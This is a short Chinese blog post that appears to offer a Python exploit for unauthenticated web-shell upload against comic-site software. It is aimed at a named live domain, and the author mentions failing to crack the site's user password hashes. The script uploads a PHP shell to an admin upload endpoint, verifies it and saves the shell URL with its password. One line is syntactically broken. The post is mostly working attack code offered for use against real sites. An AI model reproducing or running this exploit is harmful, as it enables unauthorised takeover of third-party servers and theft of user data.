标签 歪歪漫画getshell 下的文章

歪歪漫画前台无限制getshell


这是一个前段时间拿到的一个getshell
由于网站用户是用password_hash解不开 所以现在才发出来
需要安装requests库
用法:python 文件名.py

import requests
import json
from urllib.parse import urlparse

def upload_shell(url):
    #vn_url="http://www.wap.hgmh12.com/admin/FileUpload/uploadfile"
    vn_url = url + "/admin/FileUpload/uploadfile"
    files={"file":("t00ls.php",open("t00ls.php","rb"))}
    try:
        res=requests.post(vn_url,files=files)
        res=res.json()
        domain = urlparse(vn_url)
        domain = domain.scheme+"://"+domain.netloc
        shell_address = domain + res"data"
        shell_code = requests.get(shell_address).status_code
        if shell_code == 200:
            print("[+] Success Url:%s"%shell_address)
            filename = 'shell.txt'
            with open(filename, 'w') as file_object:
                file_object.write("Success Url:%s"%shell_address%"密码:pass")
        elif shell_code == 500 :
            print("[-] Shell is 500 %s" % shell_address)
        elif shell_code == 404:
            print("[-] Faild Error")
    except Exception as e:
        print(e)
    
    



upload_shell("https://www.yymh556.com/")